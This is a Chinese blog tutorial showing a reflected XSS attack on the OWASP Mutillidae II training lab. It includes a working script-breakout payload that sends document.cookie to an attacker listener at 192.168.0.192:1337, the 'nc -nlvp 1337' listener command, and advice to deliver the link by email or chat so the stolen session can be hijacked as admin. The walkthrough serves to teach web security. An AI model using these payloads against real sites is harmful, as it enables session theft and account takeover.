相关阅读
5个月前5个月前
5个月前视频讲解
网络钓鱼通常会通过JavaScript注入恶意payload,如果你在登录的情况下点击,往往会造成cookie泄露,恶意攻击者可以通过cookie直接登录,然后接管你的账号!
图文讲解
以下使用的是OWASP mutillidae II靶场
(其实视频中有一处翻译错误的地方,就是把mutillidae翻译成了multiple days了😊,不过并不影响咯)
我们打开burpsuite,开启拦截(这里显示intercept is on)
![图片[1]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827033556772-1024x557-1.webp)
并访问password-generator相关页面,回车
![图片[2]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827033345178-1024x575-1.webp)
点击Send to Repeater
![图片[3]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827033855700-1024x560-1.webp)
之后我们可以对请求进行调整之后自由的发送,点击Send即可,这样在注入时就会方便很多
![图片[4]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827033935604-1024x560-1.webp)
我们可以在响应中看到JavaScript的相关代码
![图片[5]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827033218155-1024x559-1.webp)
我们可以将其复制到编辑器中进行修改,这样看的会清晰些
![图片[6]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827034112105-1024x567-1.webp)
我们添加一段代码尝试获取cookie
![图片[7]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827034225823-1024x213-1.webp)
其实就是截断了之前的JavaScript脚本
;}catch(e){}alert(document.cookie);try{hackerloiisveryhandsome="我们添加的这个部分放到URL里就可以在输入时进行拼接了
![图片[8]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827034353989-1024x561-1.webp)
我们可以直接在浏览器里粘贴,也可以用repeater发,这个看个人习惯
![图片[9]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827034430653-1024x473-1.webp)
然后回车,有趣的事情就发生了,可以看到cookie通过弹窗的形式显示了
![图片[10]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827034500566-1024x577-1.webp)
其实有很多网友都比较疑惑的就是,有这样的弹窗有什么用呢?如何利用呢?我很多时候扫描器都能扫出来一堆XSS的漏洞,让它弹窗。这里作者给我们分享了一种方式
;}catch(e){}var i=new Image;i.src="http://192.168.0.192:1337/?"+document.cookie;try{hackerloiisveryhandsome="![图片[11]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827035351915-1024x311-1.webp)
同时需要在攻击者的服务器上监听1337端口
nc -nlvp 1337![图片[12]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827035424654.webp)
之后我们需要做的是把链接通过邮件或者聊天软件等方式进行投递,如果网友进行了点击
![图片[13]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827035512615-1024x119-1.webp)
我们就可以在刚才开启1337端口监听的终端里找到cookie了
![图片[14]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827035552183-1024x560-1.webp)
拿到cookie之后,我们使用firefox浏览器的F12开发者工具,找到cookie值,我们可以看到现在是Not Logged in,未登录的状态
![图片[15]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827035636201-1024x576-1.webp)
修改之后回车,可以看到我们现在是管理员身份进行登录的了,这大概就是xss的魅力吧,无需账户密码,通过cookie登录接管账户!
![图片[16]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220827035730295-1024x560-1.webp)
暂无评论内容